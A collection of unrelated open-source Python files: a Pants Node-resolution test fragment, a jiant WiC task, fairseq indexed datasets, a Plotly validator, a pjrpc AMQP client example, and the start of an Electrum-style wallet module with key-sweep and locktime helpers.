# level under leaf, and then not install the typ1 target (typ version 0.6.x) under util
# because the dependency is already satisfied.
typ_packages = []
for root, _, files in os.walk(node_path):
for f in files:
if 'package.json' == f:
with open(os.path.join(root, f)) as fp:
package = json.load(fp)
if 'typ' == package['name']:
typ_packages.append(os.path.relpath(os.path.join(root, f), node_path))
self.assertEqual(1, len(typ_packages),
'Expected to find exactly 1 de-duped `typ` package, but found these:'
'\n\t{}'.format('\n\t'.join(sorted(typ_packages))))
script_path = os.path.join(node_path, 'leaf.js')
out = task.node_distribution.node_command(args=[script_path]).check_output()
lines = {line.strip() for line in out.splitlines()}
self.assertIn('type of boolean is: boolean', lines)
self.assertIn('type of bool is: boolean', lines)
def test_resolve_preserves_package_json(self):
self.create_file('src/node/util/package.json', contents=dedent("""
{
"name": "util",
"version": "0.0.1"
}
"""))
util = self.make_target(spec='src/node/util',
target_type=NodeModule,
sources=['package.json'],
dependencies=[])
self.create_file('src/node/scripts_project/package.json', contents=dedent("""
{
"name": "scripts_project",
"version": "1.2.3",
"dependencies": { "A": "file://A" },
"devDependencies": { "B": "file://B" },
"peerDependencies": { "C": "file://C" },
"optionalDependencies": { "D": "file://D" },
"scripts": {
"test": "mocha */dist.js"
}
}
"""))
scripts_project = self.make_target(spec='src/node/scripts_project',
target_type=NodeModule,
sources=['package.json'],
dependencies=[util])
context = self.context(target_roots=[scripts_project])
task = self.create_task(context)
task.execute()
node_paths = context.products.get_data(NodePaths)
node_path = node_paths.node_path(scripts_project)
self.assertIsNotNone(node_paths.node_path(scripts_project))
package_json_path = os.path.join(node_path, 'package.json')
with open(package_json_path) as fp:
package = json.load(fp)
self.assertEqual('scripts_project', package['name'],
'Expected to find package name of `scripts_project`, but found: {}'
.format(package['name']))
self.assertEqual('1.2.3', package['version'],
'Expected to find package version of `1.2.3`, but found: {}'
.format(package['version']))
self.assertEqual('mocha */dist.js', package['scripts']['test'],
'Expected to find package test script of `mocha */dist.js`, but found: {}'
.format(package['scripts']['test']))
self.assertEqual(node_paths.node_path(util), package['dependencies']['util'])
self.assertNotIn('A', package['dependencies'])
self.assertNotIn('devDependencies', package)
self.assertNotIn('peerDependencies', package)
self.assertNotIn('optionalDependencies', package)
|
the-stack_106_19062
|
import numpy as np
import torch
from dataclasses import dataclass
from typing import List
from jiant.tasks.core import (
BaseExample,
BaseTokenizedExample,
BaseDataRow,
BatchMixin,
Task,
TaskTypes,
)
from jiant.tasks.lib.templates.shared import (
labels_to_bimap,
add_cls_token,
create_input_set_from_tokens_and_segments,
)
from jiant.tasks.utils import truncate_sequences, ExclusiveSpan
from jiant.utils.python.io import read_json_lines
from jiant.tasks.lib.templates import hacky_tokenization_matching as tokenization_utils
@dataclass
class Example(BaseExample):
guid: str
sentence1: str
sentence2: str
word: str
span1: ExclusiveSpan
span2: ExclusiveSpan
label: str
def tokenize(self, tokenizer):
sentence1_tokens, sentence1_span = tokenization_utils.get_token_span(
sentence=self.sentence1, span=self.span1, tokenizer=tokenizer,
)
sentence2_tokens, sentence2_span = tokenization_utils.get_token_span(
sentence=self.sentence2, span=self.span2, tokenizer=tokenizer,
)
return TokenizedExample(
guid=self.guid,
sentence1_tokens=sentence1_tokens,
sentence2_tokens=sentence2_tokens,
word=tokenizer.tokenize(self.word), # might be more than one token
sentence1_span=sentence1_span,
sentence2_span=sentence2_span,
label_id=WiCTask.LABEL_TO_ID[self.label],
)
@dataclass
class TokenizedExample(BaseTokenizedExample):
guid: str
sentence1_tokens: List[str]
sentence2_tokens: List[str]
word: List[str]
sentence1_span: ExclusiveSpan
sentence2_span: ExclusiveSpan
label_id: int
def featurize(self, tokenizer, feat_spec):
if feat_spec.sep_token_extra:
maybe_extra_sep = [tokenizer.sep_token]
maybe_extra_sep_segment_id = [feat_spec.sequence_a_segment_id]
special_tokens_count = 6 # CLS, SEP-SEP, SEP-SEP, SEP
else:
maybe_extra_sep = []
maybe_extra_sep_segment_id = []
special_tokens_count = 4 # CLS, SEP, SEP, SEP
sentence1_tokens, sentence2_tokens = truncate_sequences(
tokens_ls=[self.sentence1_tokens, self.sentence2_tokens],
max_length=feat_spec.max_seq_length - len(self.word) - special_tokens_count,
)
unpadded_tokens = (
self.word
+ [tokenizer.sep_token]
+ maybe_extra_sep
+ sentence1_tokens
+ [tokenizer.sep_token]
+ maybe_extra_sep
+ sentence2_tokens
+ [tokenizer.sep_token]
)
# Don't have a choice here -- just leave words as part of sent1
unpadded_segment_ids = (
[feat_spec.sequence_a_segment_id] * (len(self.word) + 1)
+ maybe_extra_sep_segment_id
+ [feat_spec.sequence_a_segment_id] * (len(sentence1_tokens) + 1)
+ maybe_extra_sep_segment_id
+ [feat_spec.sequence_b_segment_id] * (len(sentence2_tokens) + 1)
)
unpadded_inputs = add_cls_token(
unpadded_tokens=unpadded_tokens,
unpadded_segment_ids=unpadded_segment_ids,
tokenizer=tokenizer,
feat_spec=feat_spec,
)
input_set = create_input_set_from_tokens_and_segments(
unpadded_tokens=unpadded_inputs.unpadded_tokens,
unpadded_segment_ids=unpadded_inputs.unpadded_segment_ids,
tokenizer=tokenizer,
feat_spec=feat_spec,
)
word_sep_offset = 2 if feat_spec.sep_token_extra else 1
sent1_sep_offset = 2 if feat_spec.sep_token_extra else 1
# Both should be inclusive spans at the end
sentence1_span = ExclusiveSpan(
start=self.sentence1_span[0]
+ unpadded_inputs.cls_offset
+ word_sep_offset
+ len(self.word),
end=self.sentence1_span[1]
+ unpadded_inputs.cls_offset
+ word_sep_offset
+ len(self.word),
).to_inclusive()
sentence2_span = ExclusiveSpan(
start=self.sentence2_span[0]
+ unpadded_inputs.cls_offset
+ word_sep_offset
+ sent1_sep_offset
+ len(self.word)
+ len(sentence1_tokens),
end=self.sentence2_span[1]
+ unpadded_inputs.cls_offset
+ word_sep_offset
+ sent1_sep_offset
+ len(self.word)
+ len(sentence1_tokens),
).to_inclusive()
return DataRow(
guid=self.guid,
input_ids=np.array(input_set.input_ids),
input_mask=np.array(input_set.input_mask),
segment_ids=np.array(input_set.segment_ids),
spans=np.array([sentence1_span, sentence2_span]),
label_id=self.label_id,
tokens=unpadded_inputs.unpadded_tokens,
word=self.word,
)
@dataclass
class DataRow(BaseDataRow):
guid: str
input_ids: np.array
input_mask: np.array
segment_ids: np.array
spans: np.array # num_spans x 2
label_id: int
tokens: List
word: List
@dataclass
class Batch(BatchMixin):
input_ids: torch.LongTensor
input_mask: torch.LongTensor
segment_ids: torch.LongTensor
spans: torch.LongTensor
label_id: torch.LongTensor
tokens: List
word: List
class WiCTask(Task):
Example = Example
TokenizedExample = Example
DataRow = DataRow
Batch = Batch
TASK_TYPE = TaskTypes.SPAN_COMPARISON_CLASSIFICATION
LABELS = [False, True]
LABEL_TO_ID, ID_TO_LABEL = labels_to_bimap(LABELS)
@property
def num_spans(self):
return 2
def get_train_examples(self):
return self._create_examples(lines=read_json_lines(self.train_path), set_type="train")
def get_val_examples(self):
return self._create_examples(lines=read_json_lines(self.val_path), set_type="val")
def get_test_examples(self):
return self._create_examples(lines=read_json_lines(self.test_path), set_type="test")
@classmethod
def _create_examples(cls, lines, set_type):
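# Each line is expected to be a SuperGLUE WiC record, roughly of the form (sketch,
# values illustrative): {"word": "board", "sentence1": "...", "sentence2": "...",
# "start1": 0, "end1": 5, "start2": 4, "end2": 9, "label": true, "idx": 0}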
examples = []
for line in lines:
span1 = ExclusiveSpan(int(line["start1"]), int(line["end1"]))
span2 = ExclusiveSpan(int(line["start2"]), int(line["end2"]))
# Note, the chosen word may be different (e.g. different tenses) in sent1 and sent2,
# hence we don't do an assert here.
examples.append(
Example(
guid="%s-%s" % (set_type, line["idx"]),
sentence1=line["sentence1"],
sentence2=line["sentence2"],
word=line["word"],
span1=span1,
span2=span2,
label=line["label"] if set_type != "test" else cls.LABELS[-1],
)
)
return examples
|
the-stack_106_19063
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from functools import lru_cache
import os
import shutil
import struct
import numpy as np
import torch
from . import FairseqDataset
def __best_fitting_dtype(vocab_size=None):
if vocab_size is not None and vocab_size < 65500:
return np.uint16
else:
return np.int32
def get_available_dataset_impl():
return ['raw', 'lazy', 'cached', 'mmap']
def infer_dataset_impl(path):
if IndexedRawTextDataset.exists(path):
return 'raw'
elif IndexedDataset.exists(path):
with open(index_file_path(path), 'rb') as f:
magic = f.read(8)
if magic == IndexedDataset._HDR_MAGIC:
return 'cached'
elif magic == MMapIndexedDataset.Index._HDR_MAGIC[:8]:
return 'mmap'
else:
return None
else:
return None
def make_builder(out_file, impl, vocab_size=None):
if impl == 'mmap':
return MMapIndexedDatasetBuilder(out_file, dtype=__best_fitting_dtype(vocab_size))
else:
return IndexedDatasetBuilder(out_file)
def make_dataset(path, impl, fix_lua_indexing=False, dictionary=None):
if impl == 'raw' and IndexedRawTextDataset.exists(path):
assert dictionary is not None
return IndexedRawTextDataset(path, dictionary)
elif impl == 'lazy' and IndexedDataset.exists(path):
return IndexedDataset(path, fix_lua_indexing=fix_lua_indexing)
elif impl == 'cached' and IndexedDataset.exists(path):
return IndexedCachedDataset(path, fix_lua_indexing=fix_lua_indexing)
elif impl == 'mmap' and MMapIndexedDataset.exists(path):
return MMapIndexedDataset(path)
return None
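# Rough usage sketch for the builder/reader helpers above (paths hypothetical,
# `tensors` is any iterable of 1-D integer torch tensors):
#     builder = make_builder('data.bin', impl='mmap', vocab_size=32000)
#     for t in tensors:
#         builder.add_item(t)
#     builder.finalize('data.idx')
#     ds = make_dataset('data', impl='mmap')  # reads data.idx / data.bin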
def dataset_exists(path, impl):
if impl == 'raw':
return IndexedRawTextDataset.exists(path)
elif impl == 'mmap':
return MMapIndexedDataset.exists(path)
else:
return IndexedDataset.exists(path)
def read_longs(f, n):
a = np.empty(n, dtype=np.int64)
f.readinto(a)
return a
def write_longs(f, a):
f.write(np.array(a, dtype=np.int64))
dtypes = {
1: np.uint8,
2: np.int8,
3: np.int16,
4: np.int32,
5: np.int64,
6: np.float,
7: np.double,
8: np.uint16
}
def code(dtype):
for k in dtypes.keys():
if dtypes[k] == dtype:
return k
raise ValueError(dtype)
def index_file_path(prefix_path):
return prefix_path + '.idx'
def data_file_path(prefix_path):
return prefix_path + '.bin'
class IndexedDataset(FairseqDataset):
"""Loader for TorchNet IndexedDataset"""
_HDR_MAGIC = b'TNTIDX\x00\x00'
def __init__(self, path, fix_lua_indexing=False):
super().__init__()
self.path = path
self.fix_lua_indexing = fix_lua_indexing
self.data_file = None
self.read_index(path)
def read_index(self, path):
with open(index_file_path(path), 'rb') as f:
magic = f.read(8)
assert magic == self._HDR_MAGIC, (
'Index file doesn\'t match expected format. '
'Make sure that --dataset-impl is configured properly.'
)
version = f.read(8)
assert struct.unpack('<Q', version) == (1,)
code, self.element_size = struct.unpack('<QQ', f.read(16))
self.dtype = dtypes[code]
self._len, self.s = struct.unpack('<QQ', f.read(16))
self.dim_offsets = read_longs(f, self._len + 1)
self.data_offsets = read_longs(f, self._len + 1)
self.sizes = read_longs(f, self.s)
def read_data(self, path):
self.data_file = open(data_file_path(path), 'rb', buffering=0)
def check_index(self, i):
if i < 0 or i >= self._len:
raise IndexError('index out of range')
def __del__(self):
if self.data_file:
self.data_file.close()
@lru_cache(maxsize=8)
def __getitem__(self, i):
if not self.data_file:
self.read_data(self.path)
self.check_index(i)
tensor_size = self.sizes[self.dim_offsets[i]:self.dim_offsets[i + 1]]
a = np.empty(tensor_size, dtype=self.dtype)
self.data_file.seek(self.data_offsets[i] * self.element_size)
self.data_file.readinto(a)
item = torch.from_numpy(a).long()
if self.fix_lua_indexing:
item -= 1 # subtract 1 for 0-based indexing
return item
def __len__(self):
return self._len
def num_tokens(self, index):
return self.sizes[index]
def size(self, index):
return self.sizes[index]
@staticmethod
def exists(path):
return (
os.path.exists(index_file_path(path)) and os.path.exists(data_file_path(path))
)
@property
def supports_prefetch(self):
return False # avoid prefetching to save memory
class IndexedCachedDataset(IndexedDataset):
def __init__(self, path, fix_lua_indexing=False):
super().__init__(path, fix_lua_indexing=fix_lua_indexing)
self.cache = None
self.cache_index = {}
@property
def supports_prefetch(self):
return True
def prefetch(self, indices):
if all(i in self.cache_index for i in indices):
return
if not self.data_file:
self.read_data(self.path)
indices = sorted(set(indices))
total_size = 0
for i in indices:
total_size += self.data_offsets[i + 1] - self.data_offsets[i]
self.cache = np.empty(total_size, dtype=self.dtype)
ptx = 0
self.cache_index.clear()
for i in indices:
self.cache_index[i] = ptx
size = self.data_offsets[i + 1] - self.data_offsets[i]
a = self.cache[ptx: ptx + size]
self.data_file.seek(self.data_offsets[i] * self.element_size)
self.data_file.readinto(a)
ptx += size
if self.data_file:
# close and delete data file after prefetch so we can pickle
self.data_file.close()
self.data_file = None
@lru_cache(maxsize=8)
def __getitem__(self, i):
self.check_index(i)
tensor_size = self.sizes[self.dim_offsets[i]:self.dim_offsets[i + 1]]
a = np.empty(tensor_size, dtype=self.dtype)
ptx = self.cache_index[i]
np.copyto(a, self.cache[ptx: ptx + a.size])
item = torch.from_numpy(a).long()
if self.fix_lua_indexing:
item -= 1 # subtract 1 for 0-based indexing
return item
class IndexedRawTextDataset(FairseqDataset):
"""Takes a text file as input and binarizes it in memory at instantiation.
Original lines are also kept in memory"""
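# Usage sketch (assumes a fairseq Dictionary instance `dictionary` and a plain-text
# file with one sentence per line):
#     dataset = IndexedRawTextDataset('train.txt', dictionary)
#     tokens = dataset[0]                    # LongTensor of token ids
#     line = dataset.get_original_text(0)    # untokenized original line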
def __init__(self, path, dictionary, append_eos=True, reverse_order=False):
self.tokens_list = []
self.lines = []
self.sizes = []
self.append_eos = append_eos
self.reverse_order = reverse_order
self.read_data(path, dictionary)
self.size = len(self.tokens_list)
def read_data(self, path, dictionary):
with open(path, 'r', encoding='utf-8') as f:
for line in f:
self.lines.append(line.strip('\n'))
tokens = dictionary.encode_line(
line, add_if_not_exist=False,
append_eos=self.append_eos, reverse_order=self.reverse_order,
).long()
self.tokens_list.append(tokens)
self.sizes.append(len(tokens))
self.sizes = np.array(self.sizes)
def check_index(self, i):
if i < 0 or i >= self.size:
raise IndexError('index out of range')
@lru_cache(maxsize=8)
def __getitem__(self, i):
self.check_index(i)
return self.tokens_list[i]
def get_original_text(self, i):
self.check_index(i)
return self.lines[i]
def __del__(self):
pass
def __len__(self):
return self.size
def num_tokens(self, index):
return self.sizes[index]
def size(self, index):
return self.sizes[index]
@staticmethod
def exists(path):
return os.path.exists(path)
class IndexedDatasetBuilder(object):
element_sizes = {
np.uint8: 1,
np.int8: 1,
np.int16: 2,
np.int32: 4,
np.int64: 8,
np.float: 4,
np.double: 8
}
def __init__(self, out_file, dtype=np.int32):
self.out_file = open(out_file, 'wb')
self.dtype = dtype
self.data_offsets = [0]
self.dim_offsets = [0]
self.sizes = []
self.element_size = self.element_sizes[self.dtype]
def add_item(self, tensor):
# +1 for Lua compatibility
bytes = self.out_file.write(np.array(tensor.numpy() + 1, dtype=self.dtype))
self.data_offsets.append(self.data_offsets[-1] + bytes / self.element_size)
for s in tensor.size():
self.sizes.append(s)
self.dim_offsets.append(self.dim_offsets[-1] + len(tensor.size()))
def merge_file_(self, another_file):
index = IndexedDataset(another_file)
assert index.dtype == self.dtype
begin = self.data_offsets[-1]
for offset in index.data_offsets[1:]:
self.data_offsets.append(begin + offset)
self.sizes.extend(index.sizes)
begin = self.dim_offsets[-1]
for dim_offset in index.dim_offsets[1:]:
self.dim_offsets.append(begin + dim_offset)
with open(data_file_path(another_file), 'rb') as f:
while True:
data = f.read(1024)
if data:
self.out_file.write(data)
else:
break
def finalize(self, index_file):
self.out_file.close()
index = open(index_file, 'wb')
index.write(b'TNTIDX\x00\x00')
index.write(struct.pack('<Q', 1))
index.write(struct.pack('<QQ', code(self.dtype), self.element_size))
index.write(struct.pack('<QQ', len(self.data_offsets) - 1, len(self.sizes)))
write_longs(index, self.dim_offsets)
write_longs(index, self.data_offsets)
write_longs(index, self.sizes)
index.close()
def _warmup_mmap_file(path):
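# Read the file sequentially in 100 MiB chunks so the OS page cache is populated
# before the file is memory-mapped.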
with open(path, 'rb') as stream:
while stream.read(100 * 1024 * 1024):
pass
class MMapIndexedDataset(torch.utils.data.Dataset):
class Index(object):
_HDR_MAGIC = b'MMIDIDX\x00\x00'
@classmethod
def writer(cls, path, dtype):
class _Writer(object):
def __enter__(self):
self._file = open(path, 'wb')
self._file.write(cls._HDR_MAGIC)
self._file.write(struct.pack('<Q', 1))
self._file.write(struct.pack('<B', code(dtype)))
return self
@staticmethod
def _get_pointers(sizes):
dtype_size = dtype().itemsize
address = 0
pointers = []
for size in sizes:
pointers.append(address)
address += size * dtype_size
return pointers
def write(self, sizes):
pointers = self._get_pointers(sizes)
self._file.write(struct.pack('<Q', len(sizes)))
sizes = np.array(sizes, dtype=np.int32)
self._file.write(sizes.tobytes(order='C'))
del sizes
pointers = np.array(pointers, dtype=np.int64)
self._file.write(pointers.tobytes(order='C'))
del pointers
def __exit__(self, exc_type, exc_val, exc_tb):
self._file.close()
return _Writer()
def __init__(self, path):
with open(path, 'rb') as stream:
magic_test = stream.read(9)
assert self._HDR_MAGIC == magic_test, (
'Index file doesn\'t match expected format. '
'Make sure that --dataset-impl is configured properly.'
)
version = struct.unpack('<Q', stream.read(8))
assert (1,) == version
dtype_code, = struct.unpack('<B', stream.read(1))
self._dtype = dtypes[dtype_code]
self._dtype_size = self._dtype().itemsize
self._len = struct.unpack('<Q', stream.read(8))[0]
offset = stream.tell()
_warmup_mmap_file(path)
self._bin_buffer_mmap = np.memmap(path, mode='r', order='C')
self._bin_buffer = memoryview(self._bin_buffer_mmap)
self._sizes = np.frombuffer(self._bin_buffer, dtype=np.int32, count=self._len, offset=offset)
self._pointers = np.frombuffer(self._bin_buffer, dtype=np.int64, count=self._len,
offset=offset + self._sizes.nbytes)
def __del__(self):
self._bin_buffer_mmap._mmap.close()
del self._bin_buffer_mmap
@property
def dtype(self):
return self._dtype
@property
def sizes(self):
return self._sizes
@lru_cache(maxsize=8)
def __getitem__(self, i):
return self._pointers[i], self._sizes[i]
def __len__(self):
return self._len
def __init__(self, path):
super().__init__()
self._path = None
self._index = None
self._bin_buffer = None
self._do_init(path)
def __getstate__(self):
return self._path
def __setstate__(self, state):
self._do_init(state)
def _do_init(self, path):
self._path = path
self._index = self.Index(index_file_path(self._path))
_warmup_mmap_file(data_file_path(self._path))
self._bin_buffer_mmap = np.memmap(data_file_path(self._path), mode='r', order='C')
self._bin_buffer = memoryview(self._bin_buffer_mmap)
def __del__(self):
self._bin_buffer_mmap._mmap.close()
del self._bin_buffer_mmap
del self._index
def __len__(self):
return len(self._index)
@lru_cache(maxsize=8)
def __getitem__(self, i):
ptr, size = self._index[i]
np_array = np.frombuffer(self._bin_buffer, dtype=self._index.dtype, count=size, offset=ptr)
if self._index.dtype != np.int64:
np_array = np_array.astype(np.int64)
return torch.from_numpy(np_array)
@property
def sizes(self):
return self._index.sizes
@property
def supports_prefetch(self):
return False
@staticmethod
def exists(path):
return (
os.path.exists(index_file_path(path)) and os.path.exists(data_file_path(path))
)
class MMapIndexedDatasetBuilder(object):
def __init__(self, out_file, dtype=np.int64):
self._data_file = open(out_file, 'wb')
self._dtype = dtype
self._sizes = []
def add_item(self, tensor):
np_array = np.array(tensor.numpy(), dtype=self._dtype)
self._data_file.write(np_array.tobytes(order='C'))
self._sizes.append(np_array.size)
def merge_file_(self, another_file):
# Concatenate index
index = MMapIndexedDataset.Index(index_file_path(another_file))
assert index.dtype == self._dtype
for size in index.sizes:
self._sizes.append(size)
# Concatenate data
with open(data_file_path(another_file), 'rb') as f:
shutil.copyfileobj(f, self._data_file)
def finalize(self, index_file):
self._data_file.close()
with MMapIndexedDataset.Index.writer(index_file, self._dtype) as index:
index.write(self._sizes)
|
the-stack_106_19064
|
import _plotly_utils.basevalidators
class FamilyValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(self, plotly_name="family", parent_name="pie.title.font", **kwargs):
super(FamilyValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "plot"),
no_blank=kwargs.pop("no_blank", True),
strict=kwargs.pop("strict", True),
**kwargs,
)
|
the-stack_106_19066
|
import asyncio
import pjrpc
from pjrpc.client.backend import aio_pika as pjrpc_client
async def main():
client = pjrpc_client.Client('amqp://guest:guest@localhost:5672/v1', 'jsonrpc')
await client.connect()
response: pjrpc.Response = await client.send(pjrpc.Request('sum', params=[1, 2], id=1))
print(f"1 + 2 = {response.result}")
result = await client('sum', a=1, b=2)
print(f"1 + 2 = {result}")
result = await client.proxy.sum(1, 2)
print(f"1 + 2 = {result}")
await client.notify('tick')
if __name__ == "__main__":
asyncio.run(main())
|
the-stack_106_19067
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - Imported_Wallet: imported addresses or single keys, 0 or 1 keystore
# - Standard_Wallet: one HD keystore, P2PKH-like scripts
# - Multisig_Wallet: several HD keystores, M-of-N OP_CHECKMULTISIG scripts
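# Rough instantiation sketch (path is hypothetical and the wallet file is assumed to
# be readable without decryption; the concrete subclass is normally chosen from the
# 'wallet_type' field stored in the file):
#     config = SimpleConfig()
#     storage = WalletStorage('/path/to/wallet_file')
#     wallet = Standard_Wallet(storage, config=config)
#     wallet.get_receiving_addresses()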
import os
import sys
import random
import time
import json
import copy
import errno
import traceback
import operator
import binascii
from functools import partial
from collections import defaultdict
from numbers import Number
from decimal import Decimal
from typing import TYPE_CHECKING, List, Optional, Tuple, Union, NamedTuple, Sequence, Dict, Any, Set
from abc import ABC, abstractmethod
import itertools
from .i18n import _
from .bip32 import BIP32Node
from .crypto import sha256
from .util import (NotEnoughFunds, UserCancelled, profiler,
format_satoshis, format_fee_satoshis, NoDynamicFeeEstimates,
WalletFileException, BitcoinException,
InvalidPassword, format_time, timestamp_to_datetime, Satoshis,
Fiat, bfh, bh2u, TxMinedInfo, quantize_feerate, create_bip21_uri, OrderedDictWithIndex)
from .util import PR_TYPE_ONCHAIN, PR_TYPE_LN
from .simple_config import SimpleConfig
from .bitcoin import (COIN, TYPE_ADDRESS, TYPE_PUBKEY, is_address, address_to_script, serialize_privkey,
is_minikey, relayfee, dust_threshold, COINBASE_MATURITY, RECOMMEND_CONFIRMATIONS,
TOKEN_TRANSFER_TOPIC, b58_address_to_hash160, hash160_to_p2pkh)
from .crypto import sha256d
from . import keystore
from .keystore import load_keystore, Hardware_KeyStore, KeyStore, Mobile_KeyStore, Qt_Core_Keystore, KeyStoreWithMPK, AddressIndexGeneric
from .util import multisig_type
from .storage import StorageEncryptionVersion, WalletStorage
from . import transaction, bitcoin, coinchooser, paymentrequest, ecc, bip32
from .transaction import (Transaction, TxInput, UnknownTxinType, TxOutput,
PartialTransaction, PartialTxInput, PartialTxOutput, TxOutpoint)
from .plugin import run_hook
from .address_synchronizer import (AddressSynchronizer, TX_HEIGHT_LOCAL,
TX_HEIGHT_UNCONF_PARENT, TX_HEIGHT_UNCONFIRMED, TX_HEIGHT_FUTURE)
from .util import PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED, PR_INFLIGHT
from .contacts import Contacts
from .interface import NetworkException
from .ecc_fast import is_using_fast_ecc
from .mnemonic import Mnemonic
from .logging import get_logger
from .lnworker import LNWallet
from .paymentrequest import PaymentRequest
if TYPE_CHECKING:
from .network import Network
_logger = get_logger(__name__)
TX_STATUS = [
_('Unconfirmed'),
_('Unconfirmed parent'),
_('Not Verified'),
_('Local'),
]
def _append_utxos_to_inputs(inputs: List[PartialTxInput], network: 'Network', pubkey, txin_type, imax):
if txin_type in ('p2pkh', 'p2wpkh', 'p2wpkh-p2sh'):
address = bitcoin.pubkey_to_address(txin_type, pubkey)
scripthash = bitcoin.address_to_scripthash(address)
elif txin_type == 'p2pk':
script = bitcoin.public_key_to_p2pk_script(pubkey)
scripthash = bitcoin.script_to_scripthash(script)
address = None
else:
raise Exception(f'unexpected txin_type to sweep: {txin_type}')
u = network.run_from_another_thread(network.listunspent_for_scripthash(scripthash))
for item in u:
if len(inputs) >= imax:
break
prevout_str = item['tx_hash'] + ':%d' % item['tx_pos']
prevout = TxOutpoint.from_str(prevout_str)
utxo = PartialTxInput(prevout=prevout)
utxo._trusted_value_sats = int(item['value'])
utxo._trusted_address = address
utxo.block_height = int(item['height'])
utxo.script_type = txin_type
utxo.pubkeys = [bfh(pubkey)]
utxo.num_sig = 1
if txin_type == 'p2wpkh-p2sh':
utxo.redeem_script = bfh(bitcoin.p2wpkh_nested_script(pubkey))
inputs.append(utxo)
def sweep_preparations(privkeys, network: 'Network', imax=100):
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = ecc.ECPrivkey(privkey).get_public_key_hex(compressed=compressed)
_append_utxos_to_inputs(inputs, network, pubkey, txin_type, imax)
keypairs[pubkey] = privkey, compressed
inputs = [] # type: List[PartialTxInput]
keypairs = {}
for sec in privkeys:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
if not inputs:
raise Exception(_('No inputs found. (Note that inputs need to be confirmed)'))
# FIXME actually inputs need not be confirmed now, see https://github.com/kyuupichan/electrumx/issues/365
return inputs, keypairs
def sweep(privkeys, *, network: 'Network', config: 'SimpleConfig',
to_address: str, fee: int = None, imax=100,
locktime=None, tx_version=None) -> PartialTransaction:
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(txin.value_sats() for txin in inputs)
if fee is None:
outputs = [PartialTxOutput(scriptpubkey=bfh(bitcoin.address_to_script(to_address)),
value=total)]
tx = PartialTransaction.from_io(inputs, outputs)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise Exception(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < dust_threshold(network):
raise Exception(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d\nDust Threshold: %d'%(total, fee, dust_threshold(network)))
outputs = [PartialTxOutput(scriptpubkey=bfh(bitcoin.address_to_script(to_address)),
value=total - fee)]
if locktime is None:
locktime = get_locktime_for_new_transaction(network)
tx = PartialTransaction.from_io(inputs, outputs, locktime=locktime, version=tx_version)
tx.set_rbf(True)
tx.sign(keypairs)
return tx
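# Usage sketch (placeholders only; `network` and `config` are assumed to be live
# objects from a running client, and the WIF key / address strings are dummies):
#     tx = sweep(['<WIF private key>'], network=network, config=config,
#                to_address='<destination address>')
#     # `tx` comes back signed and RBF-enabled, ready for broadcast.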
def get_locktime_for_new_transaction(network: 'Network') -> int:
# if no network or not up to date, just set locktime to zero
if not network:
return 0
chain = network.blockchain()
header = chain.header_at_tip()
if not header:
return 0
STALE_DELAY = 8 * 60 * 60 # in seconds
if header['timestamp'] + STALE_DELAY < time.time():
return 0
# discourage "fee sniping"
locktime = chain.height()
# sometimes pick locktime a bit further back, to help privacy
# of setups that need more time (offline/multisig/coinjoin/...)
if random.randint(0, 9) == 0:
locktime = max(0, locktime - random.randint(0, 99))
return locktime
class CannotBumpFee(Exception): pass
class InternalAddressCorruption(Exception):
def __str__(self):
return _("Wallet file corruption detected. "
"Please restore your wallet from seed, and compare the addresses in both files")
class TxWalletDetails(NamedTuple):
txid: Optional[str]
status: str
label: str
can_broadcast: bool
can_bump: bool
can_save_as_local: bool
amount: Optional[int]
fee: Optional[int]
tx_mined_status: TxMinedInfo
mempool_depth_bytes: Optional[int]
class Abstract_Wallet(AddressSynchronizer, ABC):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
LOGGING_SHORTCUT = 'w'
max_change_outputs = 3
gap_limit_for_change = 6
txin_type: str
wallet_type: str
def __init__(self, storage: WalletStorage, *, config: SimpleConfig):
if not storage.is_ready_to_be_used_by_wallet():
raise Exception("storage not ready to be used by Abstract_Wallet")
self.config = config
assert self.config is not None, "config must not be None"
self.storage = storage
# load addresses needs to be called before constructor for sanity checks
self.storage.db.load_addresses(self.wallet_type)
self.keystore = None # type: Optional[KeyStore] # will be set by load_keystore
AddressSynchronizer.__init__(self, storage.db)
# saved fields
self.use_change = storage.get('use_change', True)
self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
self.frozen_addresses = set(storage.get('frozen_addresses', []))
